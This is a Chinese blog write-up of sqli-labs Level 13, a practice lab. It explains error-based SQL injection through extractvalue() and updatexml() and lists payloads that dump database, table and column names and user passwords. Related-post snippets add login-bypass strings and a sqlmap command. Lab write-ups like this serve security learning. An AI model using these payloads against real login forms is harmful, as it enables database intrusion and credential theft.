sqli-labs通关(十三)

最新推荐文章于 2024-05-03 12:26:24 发布
最新推荐文章于 2024-05-03 12:26:24 发布
阅读量525 收藏 1
点赞数 2
分类专栏: sqli-labs通关 文章标签: sql 数据库 web安全 mysql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_65950075/article/details/130477079
版权

第十三关

输入1'出现报错信息,提示我们是单引号加括号闭合的 

输入1') union select 1,2 #

但是发现没有登入成功返回信息 ,看来是要盲注了。

没有任何的返回信息,只有报错信息,那我们就用报错注入,让返回的报错信息包含我们的想要的信息

两个重要函数:updatexml() extractvalue ()

extractvalue()
作用:对XML文档进行查询,相当于在HTML文件中用标签查找元素。
语法: extractvalue( XML_document, XPath_string )
参数1:XML_document是String格式,为XML文档对象的名称
参数2:XPath_string(Xpath格式的字符串),注入时可操作的地方
报错原理:xml文档中查找字符位置是用/xxx/xxx/xxx/...这种格式,如果写入其他格式就会报错,并且会返回写入的非法格式内容,错误信息如:XPATH syntax error:'xxxxxxxx‘
最大只能显示32个字符,所以要配合limit进行使用
 

 updatexml()
作用:改变文档中符合条件的节点的值。
语法: updatexml( XML_document, XPath_string, new_value )
参数1:XML_document是String格式,为XML文档对象的名称
参数2:XPath_string(Xpath格式的字符串),注入时可操作的地方
参数3:new_value,String格式,替换查找到的符合条件的数据
报错原理:同extractvalue()

 我们构造报错

1')and extractvalue(1,concat(0x7e,(select database())))#

或者

1')and updatexml(1,concat(0x7e,(select database())),3)#

0x7e是~的意思,用concat拼接我们的sql语句,不符合xml文档的格式,就会报错,

爆表

1')and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))#

 最大只能显示32个字符,所以要配合limit进行使用,每次只能显示一个表名,limt0,1,limt1,1,limit2,1...

 爆列 

1')and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() limit 0,1)))#

爆用户名密码 

1')and extractvalue(1,concat(0x7e,(select username from users limit 0,1)))#

1')and updatexml(1,concat(0x7e,(select username from users limit 0,1)),3)#

1')and extractvalue(1,concat(0x7e,(select password from users limit 0,1)))#

1')and updatexml(1,concat(0x7e,(select password from users limit 0,1)),3)#

幕溪WM
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs第十三--十五
小人物的博客
06-18 3235
第十三 Double Injection- String- with twist(双注入 - 字符型 - 变形) 看一看它的源代码 POST传值没有任何过滤,@不显示输出,echo $sql;这个语句是我加的,为了显示再输入框中的语句是如何显示的 直接闭合,用户名和密码输入“ ‘) or (‘1’) = (‘1%23 ” 双引号里面的语句,前面的单引号加括号和sql中的括号单引号闭合,...
[网络安全]sqli-labs Less-13 解题详析
等风来
07-24 2307
以上为[网络安全]sqli-labs Less-13 解题详析,后续将分享[网络安全]sqli-labs Less-14 解题详析我是秋说,我们下次见。
sqli-labs-13
qq_53030229的博客
05-10 285
文章目录一、抓包、判断注入点二、判断回显字段三、获取数据库四、获取数据表五、获取字段六、获取用户名、密码 摸鱼中,最近不知道干什么ε=(´ο`*)))唉 一、抓包、判断注入点 二、判断回显字段 其实这里只有两个回显字段的,我这里使用3只是为了让你们方便看 uname=234')order by 3--+ 三、获取数据库 uname=234') and exp(~(select * from (select database() ) a) )--+ 四、获取数据表 uname=234') and
SQLi LABS Less-13 报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-21 1万+
SQLi 第十三SQLi-LABS Less-13,SQLi-LABS Less 13,SQLiLABS Less13,SQLi Less 13
sqli-labs/Less-13
m0_71299382的博客
11-18 262
sqli-labs第十三
sqli-labs第十三
yuqnqi的博客
05-09 372
第二个参数: xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。tip: 还有要注意的地方是,它能够查询的字符串长度最大是32个字符,如果超过32位,我们就需要用函数来查询,比如right(),left(),substr()来截取字符串。构造语句,先用 ') 进行闭合,判断列数是多少,持续增加列数,直到返回正确的结果。判断注入点的闭合方式。
sqli - labs - 13 ~ 14
m0_62102000的博客
07-15 239
sqli - labs - 13 ~ 14
sql二次注入-sqli-labs第13
weixin_46784800的博客
11-04 917
获取数据操作 判断所查询数据库中包含的列数 采用post进行参数输入: uname=') order by 3 -- - &passwd=') -- - 通过对查询结果进行排序,发现无法对第三列进行排序,且报错Unknown column ‘3’ in ‘order clause’,则说明所查询数据库中共有两列数据。 判断输出数据与数据库的联系 输入语句 uname=') or 1=1 -- - &passwd=') -- - 可发现界面只有登录成功的提示,则说明该网站为盲注,则
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqli-labs靶场第十三
gou1791241251的博客
12-27 765
paloy:admin’) or (select table_name from information_schema.tables where table_schema=database() limit 0,1)=‘emails’ # 闭合方式为’) 可以使用布尔盲注和报错注入
sqli-labs卡13(基于post提交的单引号加括号的报错盲注)通关思路
zyh1588的博客
11-10 237
小白回顾sql靶场第十三
sqli-labs-master第13、14
m_ing
05-13 1143
前言:输入内容被放到双引号中,报错型注入,注释符不可用 第十三: http://192.168.89.134/sqli-labs-master/Less-13/ 先输入:admin’) 我们还是分析一下: 我们接着用and来测试。 admin’) and 1=2# -admin’) union selec 1,2#联合查询 还是没有报错,那我们就用报错语句来测试吧,这次我使用extractvalue() 显示版本,数据库 admin’) and extractvalue(1,concat(0x7
2020.4.4 sqli-labs--第十三、十四
DSR446的博客
04-04 338
Less-13 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入) 方法一 通过报错可知 是通过’) 闭合的 发现没有登入成功返回信息 ,看来是要盲注了 万能密码: 账号admin’)# 密码:随便 方法二: 既然它返回错误信息了,说明有回显,可以报错注入。 数据库名 uname=admin') and e...
sqli-labs第十三和十四(post请求-报错盲注)
qq_42266432的博客
08-24 619
一上来,先加个单引号探探路,有sql报错回显 在单引号后继续加上and 1,试图让sql报错显示更多信息,从near ‘’) and password=(‘1’) LIMIT 0,1’ at line 1可以判断,这就用单引号加括号了,没什么意思 注入’)却发现,页面没有回显,于是这里考虑使用报错盲注或者布尔盲注,时间延时说不定也行,先采用报错盲注吧 先使用order by 拆解出字段数为2 爆出当前数据库 uname=uname=1') and 1 union select 1,updatex.
sqli-labs靶场13-14(基于POST双查询)
qq_46527080的博客
12-12 591
sqlmap方法 python2 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-13/index.php?id=1 --data "uname=')or('1')=('1 &passwd=')or('1')=('1&submit=Submit" --dbs --threads 10 --batch --technique EBS 第十三 源码分析 可以看到闭合字符为(‘’) 再查看输出的语句,可以判断出如果语句报错会输出一些东西,所以这一是基于
SQL-索引篇整理
最新发布
m0_59925573的博客
05-03 1412
聚簇索引就是按照每张表的主键构造一颗B+树,同时叶子节点中存放的就是整张表的行记录数据,也将聚集索引的叶子节点称为数据页。索引需要额外的磁盘空间,并降低写操作的性能。3.使用短索引,如果对长字符串列进行索引,应该指定一个前缀长度,这样能够节省大量索引空间,如果搜索词超过索引前缀长度,则使用索引排除不匹配的行,然后检查其余行是否可能匹配。红黑树,1.每个节点都是红or黑 2.根节点是黑 3.每个叶子节点都是黑色 4.红色节点的父子节点都必须是黑的 5.从任一个节点到叶子节点的所有路径都包含相同的黑色结点。
sqli-labs通关28
03-05
sqli-labs是一个用于学习和练习SQL入的实验平台。通关28其中的一个卡,下面是sqli-labs通关28的介绍: 在sqli-labs通关28中,你需要利用SQL注入漏洞来绕过登录验证,获取管理员权限。具体步骤如下: 1. 打开sqli-labs网站,找到通关28的页面。 2. 在登录框中输入任意用户名和密码,点击登录按钮。 3. 在URL中可以看到登录请求的参数,例如:`http://localhost/sqli-labs/Less-28/?id=1&Submit=Submit#`。 4. 在URL中的`id`参数处存在SQL注入漏洞,我们可以尝试利用这个漏洞进行攻击。 5. 输入`' or '1'='1`作为`id`参数的值,然后点击提交按钮。 6. 如果成功利用了SQL注入漏洞,你将会被认为是管理员身份登录成功,并且可以看到管理员的相信息。 请注意,sqli-labs是一个用于学习和练习SQL注入的平台,仅供合法目的使用。在实际应用中,SQL注入是一种严重的安全漏洞,需要谨慎对待。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值